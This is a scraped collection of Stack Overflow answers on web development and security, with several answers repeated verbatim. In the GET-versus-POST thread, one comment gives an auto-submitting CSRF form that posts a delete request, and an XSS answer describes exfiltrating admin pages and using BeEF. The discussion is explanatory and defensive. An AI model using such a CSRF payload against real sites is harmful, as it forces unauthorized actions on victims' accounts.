Rectangle 27 3

If you don't want the receiving user to have to install an app, you could send an SMS with a link to a website you control that uses web geolocation APIs to report position: http://dev.w3.org/geo/api/spec-source.html

The user will need to click the link in the SMS, then they will be prompted to allow the page to access their location. This will work not only on Android devices, but on any device with a browser that supports these APIs

android - Request for permission to access location trough SMS? - Stac...

android geolocation notifications sms
Rectangle 27 9

Google chooses when Sitelinks are shown for a website. You have no control over when that happens. It usually only happens when a website is very popular and a very obvious choice for a very popular search term.

If your site does qualify your site links you can suggest pages you do not want to appear in Sitelinks in Google Webmaster Tools. But this only is a suggestion and is only available after Sitelinks is available for your site.

sub sitelinks in google search result - Stack Overflow

google-search
Rectangle 27 3

It's not a good idea to just grab a copy of the page's code that does this.

Consider: you get a Content Security Policy error, because you're trying to execute a piece of code from a remote server. While you can relax the policy, let me first explain why is this a security problem.

Currently, your code loads http://dota2.cyborgmatt.com/prizetracker/data/ti4.json and executes its contents, without verifying what they are. Right now it looks like this:

populatePrizePool({"dollars":3129676});

this is a website you do not control

Imagine: you write your extension, it becomes popular, admins of the site notice the unusual traffic, change their code to load http://dota2.cyborgmatt.com/prizetracker/data/ti4_.json instead, and after a bit of googling replace the original link's contents with this:

alert("By the way, Ramana Venkata is stealing our data. Sincerely, cyborgmatt.com");

And suddenly, your extension doesn't work, you have an angry mob of users, and are slightly embarrassed.

You see the problem? It could be worse, as the replacement code can be as evil as JS permits. Since HTTP traffic is trivial to intercept, it doesn't even take cyborgmatt.com admins to inject arbitrary code in your extension, and that is why it's not even possible to relax the policy in this way.

Now, to solve the problem. Instead of AJAX-loading the code, you should just load this file, parse it to get the JSON data (i.e. {"dollars":3129676}), safely parse and validate that data, and only then use it. This way, if the above scenario happens, at least nothing evil comes of it.

Step 1: Get the data.

Replace the $.ajax call with XHR:

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
  if (xhr.readyState == 4) {
    parseAndValidate(xhr.responseText);
  }
};
xhr.open("GET", "http://dota2.cyborgmatt.com/prizetracker/data/ti4.json", true);
xhr.send();

You have a string that you expect to have the following format: populatePrizePool(SOME_JSON);, and you expect the JSON data to contain a non-negative number dollars.

function parseAndValidate(str){
  var some_json;

  // First, extract `SOME_JSON` with a regular expression:
  if(str.match(/populatePrizePool\((.*)\);/)) {
    some_json = str.match(/populatePrizePool\((.*)\);/)[1];
  } else {
    throw Error("Unexpected format for ti4.json");
  }

  // Second, _safely_ parse `some_json`:
  var data = JSON.parse(some_json); // Will throw an exception if something's not right

  // Third, ensure that the JSON has the required data:
  if( !data.dollars || typeof data.dollars !== "number" || data.dollars < 0) {
    throw Error("Unexpected data format for ti4.json");
  }

  // Finally, call the function:
  populatePrizePool(data);
}

This may be a little overkill for your tiny project, but it's a learning experience. Do not blindly trust data you don't control, even less code you don't control.

browser action - Refused to load script in Chrome Extension - Stack Ov...

google-chrome-extension browser-action
Rectangle 27 399

The GET request is marginally less secure than the POST request. Neither offers true "security" by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using GET requests can make an otherwise secure application insecure.

The mantra that you "must not use GET requests to make changes" is still very much valid, but this has little to do with malicious behaviour. Login forms are the ones most sensitive to being sent using the wrong request type.

This is the real reason you should use POST requests for changing data. Search spiders will follow every link on your website, but will not submit random forms they find.

Web accelerators are worse than search spiders, because they run on the clients machine, and "click" all links in the context of the logged in user. Thus, an application that uses a GET request to delete stuff, even if it requires an administrator, will happily obey the orders of the (non-malicious!) web accelerator and delete everything it sees.

The only scenario in which POST is slightly less susceptible is that many websites that arent under the attackers control (say, a third-party forum) allow embedding arbitrary images (allowing the attacker to inject an arbitrary GET request), but prevent all ways of injecting an arbitary POST request, whether automatic or manual.

One might argue that web accelerators are an example of confused deputy attack, but thats just a matter of definition. If anything, a malicious attacker has no control over this, so its hardly an attack, even if the deputy is confused.

Proxy servers are likely to log GET URLs in their entirety, without stripping the query string. POST request parameters are not normally logged. Cookies are unlikely to be logged in either case. (example)

This is a very weak argument in favour of POST. Firstly, un-encrypted traffic can be logged in its entirety; a malicious proxy already has everything it needs. Secondly, the request parameters are of limited use to an attacker: what they really need is the cookies, so if the only thing they have are proxy logs, they are unlikely to be able to attack either a GET or a POST URL.

There is one exception for login requests: these tend to contain the users password. Saving this in the proxy log opens up a vector of attack that is absent in the case of POST. However, login over plain HTTP is inherently insecure anyway.

Caching proxies might retain GET responses, but not POST responses. Having said that, GET responses can be made non-cacheable with less effort than converting the URL to a POST handler.

If the user were to navigate to a third party website from the page served in response to a GET request, that third party website gets to see all the GET request parameters.

Belongs to the category of "reveals request parameters to a third party", whose severity depends on what is present in those parameters. POST requests are naturally immune to this, however to exploit the GET request a hacker would need to insert a link to their own website into the servers response.

This is very similar to the "proxy logs" argument: GET requests are stored in the browser history along with their parameters. The attacker can easily obtain these if they have physical access to the machine.

The browser will retry a GET request as soon as the user hits "refresh". It might do that when restoring tabs after shutdown. Any action (say, a payment) will thus be repeated without warning.

The browser will not retry a POST request without a warning.

This is a good reason to use only POST requests for changing data, but has nothing to do with malicious behaviour and, hence, security.

  • If your site performs sensitive operations, you really need someone who knows what theyre doing, because this cant be covered in a single answer. You need to use HTTPS, HSTS, CSP, mitigate SQL injection, script injection (XSS), CSRF, and a gazillion of other things that may be specific to your platform (like the mass assignment vulnerability in various frameworks: ASP.NET MVC, Ruby on Rails, etc.). There is no single thing that will make the difference between "secure" (not exploitable) and "not secure".

Over HTTPS, POST data is encoded, but could URLs be sniffed by a 3rd party?

No, they cant be sniffed. But the URLs will be stored in the browser history.

Would it be fair to say the best practice is to avoid possible placing sensitive data in the POST or GET altogether and using server side code to handle sensitive information instead?

Depends on how sensitive it is, or more specifically, in what way. Obviously the client will see it. Anyone with physical access to the clients computer will see it. The client can spoof it when sending it back to you. If those matter then yes, keep the sensitive data on the server and dont let it leave.

ahem, CSRF is just as possible with POST.

@Lotus Notes, it is very slightly more difficult, but you do not need any kind of XSS. POST requests are being sent all the time all over the place, and dont forget the CSRF can be sourced from any website, XSS not included.

no you have to make somebody else with privileges to type it, as opposed to a GET which will be silently fetched by the browser. considering that every POST form should be protected with verifiable source hash, and there's no such means for a GET link, your point is silly.

Well, you could add a hash to all your GET requests exactly the same way you add them to POST forms... But you should still not use GET for anything that modifies data.

Using POST over GET doesn't prevent any kind of CSRF. It just makes them slightly easier to do, since it's easier to get people to go to a random website that allows images from urls, than go to a website that you control (enough to have javascript). Doing <body onload="document.getElementById('a').submit()"><form id="a" action="http://example.com/delete.php" action="post"><input type="hidden" name="id" value="12"></form> isn't really that hard to submit a post somewhere automatically by clicking a link (that contains that html)

html - Is either GET or POST more secure than the other? - Stack Overf...

html security http
Rectangle 27 396

The GET request is marginally less secure than the POST request. Neither offers true "security" by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using GET requests can make an otherwise secure application insecure.

The mantra that you "must not use GET requests to make changes" is still very much valid, but this has little to do with malicious behaviour. Login forms are the ones most sensitive to being sent using the wrong request type.

This is the real reason you should use POST requests for changing data. Search spiders will follow every link on your website, but will not submit random forms they find.

Web accelerators are worse than search spiders, because they run on the clients machine, and "click" all links in the context of the logged in user. Thus, an application that uses a GET request to delete stuff, even if it requires an administrator, will happily obey the orders of the (non-malicious!) web accelerator and delete everything it sees.

The only scenario in which POST is slightly less susceptible is that many websites that arent under the attackers control (say, a third-party forum) allow embedding arbitrary images (allowing the attacker to inject an arbitrary GET request), but prevent all ways of injecting an arbitary POST request, whether automatic or manual.

One might argue that web accelerators are an example of confused deputy attack, but thats just a matter of definition. If anything, a malicious attacker has no control over this, so its hardly an attack, even if the deputy is confused.

Proxy servers are likely to log GET URLs in their entirety, without stripping the query string. POST request parameters are not normally logged. Cookies are unlikely to be logged in either case. (example)

This is a very weak argument in favour of POST. Firstly, un-encrypted traffic can be logged in its entirety; a malicious proxy already has everything it needs. Secondly, the request parameters are of limited use to an attacker: what they really need is the cookies, so if the only thing they have are proxy logs, they are unlikely to be able to attack either a GET or a POST URL.

There is one exception for login requests: these tend to contain the users password. Saving this in the proxy log opens up a vector of attack that is absent in the case of POST. However, login over plain HTTP is inherently insecure anyway.

Caching proxies might retain GET responses, but not POST responses. Having said that, GET responses can be made non-cacheable with less effort than converting the URL to a POST handler.

If the user were to navigate to a third party website from the page served in response to a GET request, that third party website gets to see all the GET request parameters.

Belongs to the category of "reveals request parameters to a third party", whose severity depends on what is present in those parameters. POST requests are naturally immune to this, however to exploit the GET request a hacker would need to insert a link to their own website into the servers response.

This is very similar to the "proxy logs" argument: GET requests are stored in the browser history along with their parameters. The attacker can easily obtain these if they have physical access to the machine.

The browser will retry a GET request as soon as the user hits "refresh". It might do that when restoring tabs after shutdown. Any action (say, a payment) will thus be repeated without warning.

The browser will not retry a POST request without a warning.

This is a good reason to use only POST requests for changing data, but has nothing to do with malicious behaviour and, hence, security.

  • If your site performs sensitive operations, you really need someone who knows what theyre doing, because this cant be covered in a single answer. You need to use HTTPS, HSTS, CSP, mitigate SQL injection, script injection (XSS), CSRF, and a gazillion of other things that may be specific to your platform (like the mass assignment vulnerability in various frameworks: ASP.NET MVC, Ruby on Rails, etc.). There is no single thing that will make the difference between "secure" (not exploitable) and "not secure".

Over HTTPS, POST data is encoded, but could URLs be sniffed by a 3rd party?

No, they cant be sniffed. But the URLs will be stored in the browser history.

Would it be fair to say the best practice is to avoid possible placing sensitive data in the POST or GET altogether and using server side code to handle sensitive information instead?

Depends on how sensitive it is, or more specifically, in what way. Obviously the client will see it. Anyone with physical access to the clients computer will see it. The client can spoof it when sending it back to you. If those matter then yes, keep the sensitive data on the server and dont let it leave.

ahem, CSRF is just as possible with POST.

@Lotus Notes, it is very slightly more difficult, but you do not need any kind of XSS. POST requests are being sent all the time all over the place, and dont forget the CSRF can be sourced from any website, XSS not included.

no you have to make somebody else with privileges to type it, as opposed to a GET which will be silently fetched by the browser. considering that every POST form should be protected with verifiable source hash, and there's no such means for a GET link, your point is silly.

Well, you could add a hash to all your GET requests exactly the same way you add them to POST forms... But you should still not use GET for anything that modifies data.

Using POST over GET doesn't prevent any kind of CSRF. It just makes them slightly easier to do, since it's easier to get people to go to a random website that allows images from urls, than go to a website that you control (enough to have javascript). Doing <body onload="document.getElementById('a').submit()"><form id="a" action="http://example.com/delete.php" action="post"><input type="hidden" name="id" value="12"></form> isn't really that hard to submit a post somewhere automatically by clicking a link (that contains that html)

html - Is either GET or POST more secure than the other? - Stack Overf...

html security http
Rectangle 27 2

Sometimes, it's also possible to use XSS as a vector to trigger and leverage Cross-Site Request Forgery (CSRF) attacks.

Having an XSS on a website is like having control on the javascript a user will execute when visiting it. If an administrator stumbles upon your XSS code (either by sending a malicious link or by means of a stored XSS), then you might get him or her to execute requests or actions on the webserver that a normal user usually wouldn't have access to. If you know the webpage layout well enough, you can request webpages on the visitor's behalf (backends, user lists, etc.), and have the results sent (exfiltrated) anywhere on the Internet.

You can also use more advanced attack frameworks such as BeEF to attempt to exploit vulnerabilities in your visitor's browser. If the visitor in question is a website administrator, this might yield interesting information to further attack the webserver.

XSS per se won't allow you to execute code on the server, but it's a great vector to leverage other vulnerabilities present on the web application.

Sign up for our newsletter and get our top new questions delivered to your inbox (see an example).

security - Can XSS be executed on server? - Stack Overflow

security xss
Rectangle 27 42

EDIT 2014: For what it's worth, a lot of the info in this answer is no longer correct - see comments.

With Windows Azure Websites, you don't have control over IIS or web Server because you are using a resources slice along with hundreds of other website on the same machine, you are sharing resources like any other so there is no control over IIS.

The big difference between a website shared and Azure web role is that a web-site is considered process bound while roles are VM bound.

Websites are stored on a content share which is accessible from all the "web servers" in the farm so there is no replication or anything like that required.

Windows Azure websites can not have their own host name instead they must use websitename.azurewebsites.net only and you sure can use CNAME setting in your DNS provider to route your request exactly same with previous Windows Azure Role only when they are running in reserved mode. CNAME setting is not supported for shared websites.

I believe for WA Web Sites, only apps running with reserved instances (dedicated VMs) are able to have custom domains mapped to them.

For what it's worth, a lot of the info in this answer is no longer correct (though it was in June 2012): Web Sites can now have custom domains. Web sites can run in a "reserved" mode, which is essentially a VM, but completely managed.

What is the difference between an Azure Web Site and an Azure Web Role...

azure azure-web-roles azure-web-sites
Rectangle 27 42

EDIT 2014: For what it's worth, a lot of the info in this answer is no longer correct - see comments.

With Windows Azure Websites, you don't have control over IIS or web Server because you are using a resources slice along with hundreds of other website on the same machine, you are sharing resources like any other so there is no control over IIS.

The big difference between a website shared and Azure web role is that a web-site is considered process bound while roles are VM bound.

Websites are stored on a content share which is accessible from all the "web servers" in the farm so there is no replication or anything like that required.

Windows Azure websites can not have their own host name instead they must use websitename.azurewebsites.net only and you sure can use CNAME setting in your DNS provider to route your request exactly same with previous Windows Azure Role only when they are running in reserved mode. CNAME setting is not supported for shared websites.

I believe for WA Web Sites, only apps running with reserved instances (dedicated VMs) are able to have custom domains mapped to them.

For what it's worth, a lot of the info in this answer is no longer correct (though it was in June 2012): Web Sites can now have custom domains. Web sites can run in a "reserved" mode, which is essentially a VM, but completely managed.

What is the difference between an Azure Web Site and an Azure Web Role...

azure azure-web-roles azure-web-sites
Rectangle 27 42

EDIT 2014: For what it's worth, a lot of the info in this answer is no longer correct - see comments.

With Windows Azure Websites, you don't have control over IIS or web Server because you are using a resources slice along with hundreds of other website on the same machine, you are sharing resources like any other so there is no control over IIS.

The big difference between a website shared and Azure web role is that a web-site is considered process bound while roles are VM bound.

Websites are stored on a content share which is accessible from all the "web servers" in the farm so there is no replication or anything like that required.

Windows Azure websites can not have their own host name instead they must use websitename.azurewebsites.net only and you sure can use CNAME setting in your DNS provider to route your request exactly same with previous Windows Azure Role only when they are running in reserved mode. CNAME setting is not supported for shared websites.

I believe for WA Web Sites, only apps running with reserved instances (dedicated VMs) are able to have custom domains mapped to them.

For what it's worth, a lot of the info in this answer is no longer correct (though it was in June 2012): Web Sites can now have custom domains. Web sites can run in a "reserved" mode, which is essentially a VM, but completely managed.

What is the difference between an Azure Web Site and an Azure Web Role...

azure azure-web-roles azure-web-sites
Rectangle 27 42

EDIT 2014: For what it's worth, a lot of the info in this answer is no longer correct - see comments.

With Windows Azure Websites, you don't have control over IIS or web Server because you are using a resources slice along with hundreds of other website on the same machine, you are sharing resources like any other so there is no control over IIS.

The big difference between a website shared and Azure web role is that a web-site is considered process bound while roles are VM bound.

Websites are stored on a content share which is accessible from all the "web servers" in the farm so there is no replication or anything like that required.

Windows Azure websites can not have their own host name instead they must use websitename.azurewebsites.net only and you sure can use CNAME setting in your DNS provider to route your request exactly same with previous Windows Azure Role only when they are running in reserved mode. CNAME setting is not supported for shared websites.

I believe for WA Web Sites, only apps running with reserved instances (dedicated VMs) are able to have custom domains mapped to them.

For what it's worth, a lot of the info in this answer is no longer correct (though it was in June 2012): Web Sites can now have custom domains. Web sites can run in a "reserved" mode, which is essentially a VM, but completely managed.

What is the difference between an Azure Web Site and an Azure Web Role...

azure azure-web-roles azure-web-sites
Rectangle 27 32

I'm not sure whether I should just copy/paste from a website, but I'd rather leave the answer here, instead of a link. If anyone can clarify in comments, I'll be much obliged.

Basically, you have to extend the WebBrowser class.

public class ExtendedWebBrowser : WebBrowser
{
    bool renavigating = false;

    public string UserAgent { get; set; }

    public ExtendedWebBrowser()
    {
        DocumentCompleted += SetupBrowser;

        //this will cause SetupBrowser to run (we need a document object)
        Navigate("about:blank");
    }

    void SetupBrowser(object sender, WebBrowserDocumentCompletedEventArgs e)
    {
        DocumentCompleted -= SetupBrowser;
        SHDocVw.WebBrowser xBrowser = (SHDocVw.WebBrowser)ActiveXInstance;
        xBrowser.BeforeNavigate2 += BeforeNavigate;
        DocumentCompleted += PageLoaded;
    }

    void PageLoaded(object sender, WebBrowserDocumentCompletedEventArgs e)
    {

    }

    void BeforeNavigate(object pDisp, ref object url, ref object flags, ref object targetFrameName,
        ref object postData, ref object headers, ref bool cancel)
    {
        if (!string.IsNullOrEmpty(UserAgent))
        {
            if (!renavigating)
            {
                headers += string.Format("User-Agent: {0}\r\n", UserAgent);
                renavigating = true;
                cancel = true;
                Navigate((string)url, (string)targetFrameName, (byte[])postData, (string)headers);
            }
            else
            {
                renavigating = false;
            }
        }
    }
}

Note: To use the method above youll need to add a COM reference to Microsoft Internet Controls.

He mentions your approach too, and states that the WebBrowser control seems to cache this user agent string, so it will not change the user agent without restarting the process.

link is invalid now. So yes, nearly two years later, copying and pasting turned out to be the right thing to do :)

@zourtney, heh it paid off in the end!

Is there still a way to do this? Apparently the WPF-Variant of WebBrowser is sealed and can't be used this way.

BeforeNavigate2 does not fire if control is hosted in .net application support.microsoft.com/kb/325079

SHDocVw.WebBrowser xBrowser = (SHDocVw.WebBrowser)ActiveXInstance

c# - Changing the user agent of the WebBrowser control - Stack Overflo...

c# winforms webbrowser-control user-agent
Rectangle 27 4

Since you are in full control of the website and the extension, you could use externally_connectable to enhance your website. This manifest key allows code on your website to initiate and maintain a communication channel between the website and your extension. Then you can implement the platform-independent parts (e.g. UI with HTML & CSS) in your website, delegate the Chrome-specific parts to the extension, and use the messaging API to communicate between the page and extension.

The warning that users receive will be less scary:

  • Communicate with cooperating websites

If your extension doesn't need to run on the website, but only needs to be able to send HTTP requests to your website (e.g. via an API), then you could add CORS headers to the website to allow the extension to make requests.

You could also use optional permissions to support new sites via content scripts. With this method, Chrome doesn't show any warnings upon installation. A disadvantage of this method is that your users have to approve another permission request before they can use your extension on your website.

google chrome extension - How to remove the permission warning "Read a...

google-chrome-extension
Rectangle 27 4

Since you are in full control of the website and the extension, you could use externally_connectable to enhance your website. This manifest key allows code on your website to initiate and maintain a communication channel between the website and your extension. Then you can implement the platform-independent parts (e.g. UI with HTML & CSS) in your website, delegate the Chrome-specific parts to the extension, and use the messaging API to communicate between the page and extension.

The warning that users receive will be less scary:

  • Communicate with cooperating websites

If your extension doesn't need to run on the website, but only needs to be able to send HTTP requests to your website (e.g. via an API), then you could add CORS headers to the website to allow the extension to make requests.

You could also use optional permissions to support new sites via content scripts. With this method, Chrome doesn't show any warnings upon installation. A disadvantage of this method is that your users have to approve another permission request before they can use your extension on your website.

google chrome extension - How to remove the permission warning "Read a...

google-chrome-extension
Rectangle 27 59

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a persons name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing
Rectangle 27 59

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a persons name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing
Rectangle 27 58

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a persons name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing
Rectangle 27 58

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a persons name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing
Rectangle 27 58

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a person’s name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a persons name. One should make no such assumptions, just accept any character that relevant RFC(s) say one must.

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing
Rectangle 27 139

In general, caching is good.. So there are a couple of techniques, depending on whether you're fixing the problem for yourself as you develop a website, or whether you're trying to control cache in a production environment.

General visitors to your website won't have the same experience that you're having when you're developing the site. Since the average visitor comes to the site less frequently (maybe only a few times each month, unless you're a Google or hi5 Networks), then they are less likely to have your files in cache, and that may be enough. If you want to force a new version into the browser, you can always add a query string to the request, and bump up the version number when you make major changes:

<script src="/myJavascript.js?version=4"></script>

This will ensure that everyone gets the new file. It works because the browser looks at the URL of the file to determine whether it has a copy in cache. If your server isn't set up to do anything with the query string, it will be ignored, but the name will look like a new file to the browser.

On the other hand, if you're developing a website, you don't want to change the version number every time you save a change to your development version. That would be tedious.

So while you're developing your site, a good trick would be to automatically generate a query string parameter:

<!-- Development version: -->
<script>document.write('<script src="/myJavascript.js?dev=' + Math.floor(Math.random() * 100) + '"\><\/script>');</script>

Adding a query string to the request is a good way to version a resource, but for a simple website this may be unnecessary. And remember, caching is a good thing.

It's also worth noting that the browser isn't necessarily stingy about keeping files in cache. Browsers have policies for this sort of thing, and they are usually playing by the rules laid down in the HTTP specification. When a browser makes a request to a server, part of the response is an EXPIRES header.. a date which tells the browser how long it should be kept in cache. The next time the browser comes across a request for the same file, it sees that it has a copy in cache and looks to the EXPIRES date to decide whether it should be used.

So believe it or not, it's actually your server that is making that browser cache so persistent. You could adjust your server settings and change the EXPIRES headers, but the little technique I've written above is probably a much simpler way for you to go about it. Since caching is good, you usually want to set that date far into the future (a "Far-future Expires Header"), and use the technique described above to force a change.

If you're interested in more info on HTTP or how these requests are made, a good book is "High Performance Web Sites" by Steve Souders. It's a very good introduction to the subject.

The quick trick of generating query string with Javascript works great during active development. I did the same thing with PHP.

This is the easiest way of accomplishing the original poster's desired result. The mod_rewrite method works well if you want to force a reload of the .css or .js file EVERY time you load the page. This method still allows caching until you actually change the file and really want it to force reload.

version not work in chrome

@keparo, I have ample number of the jquery in all the pages if i am going to change this manually it will take a month. If you can help me to resolve in all without coding to each page.

I've tried this solution with different browsers : adding a version number at the end of the JS file URL. Interestingly, Opera 25.0, Firefox 34.0 and Chrome 39.0.2171.65 will NOT keep the file in cache as soon as there is the version number at the end, even if the number does not change. IE 11.0 and Safari 5.1.7 work as expected though.

javascript - How to force browser to reload cached CSS/JS files? - Sta...

javascript css caching auto-versioning
Rectangle 27 139

In general, caching is good.. So there are a couple of techniques, depending on whether you're fixing the problem for yourself as you develop a website, or whether you're trying to control cache in a production environment.

General visitors to your website won't have the same experience that you're having when you're developing the site. Since the average visitor comes to the site less frequently (maybe only a few times each month, unless you're a Google or hi5 Networks), then they are less likely to have your files in cache, and that may be enough. If you want to force a new version into the browser, you can always add a query string to the request, and bump up the version number when you make major changes:

<script src="/myJavascript.js?version=4"></script>

This will ensure that everyone gets the new file. It works because the browser looks at the URL of the file to determine whether it has a copy in cache. If your server isn't set up to do anything with the query string, it will be ignored, but the name will look like a new file to the browser.

On the other hand, if you're developing a website, you don't want to change the version number every time you save a change to your development version. That would be tedious.

So while you're developing your site, a good trick would be to automatically generate a query string parameter:

<!-- Development version: -->
<script>document.write('<script src="/myJavascript.js?dev=' + Math.floor(Math.random() * 100) + '"\><\/script>');</script>

Adding a query string to the request is a good way to version a resource, but for a simple website this may be unnecessary. And remember, caching is a good thing.

It's also worth noting that the browser isn't necessarily stingy about keeping files in cache. Browsers have policies for this sort of thing, and they are usually playing by the rules laid down in the HTTP specification. When a browser makes a request to a server, part of the response is an EXPIRES header.. a date which tells the browser how long it should be kept in cache. The next time the browser comes across a request for the same file, it sees that it has a copy in cache and looks to the EXPIRES date to decide whether it should be used.

So believe it or not, it's actually your server that is making that browser cache so persistent. You could adjust your server settings and change the EXPIRES headers, but the little technique I've written above is probably a much simpler way for you to go about it. Since caching is good, you usually want to set that date far into the future (a "Far-future Expires Header"), and use the technique described above to force a change.

If you're interested in more info on HTTP or how these requests are made, a good book is "High Performance Web Sites" by Steve Souders. It's a very good introduction to the subject.

The quick trick of generating query string with Javascript works great during active development. I did the same thing with PHP.

This is the easiest way of accomplishing the original poster's desired result. The mod_rewrite method works well if you want to force a reload of the .css or .js file EVERY time you load the page. This method still allows caching until you actually change the file and really want it to force reload.

version not work in chrome

@keparo, I have ample number of the jquery in all the pages if i am going to change this manually it will take a month. If you can help me to resolve in all without coding to each page.

I've tried this solution with different browsers : adding a version number at the end of the JS file URL. Interestingly, Opera 25.0, Firefox 34.0 and Chrome 39.0.2171.65 will NOT keep the file in cache as soon as there is the version number at the end, even if the number does not change. IE 11.0 and Safari 5.1.7 work as expected though.

javascript - How to force browser to reload cached CSS/JS files? - Sta...

javascript css caching auto-versioning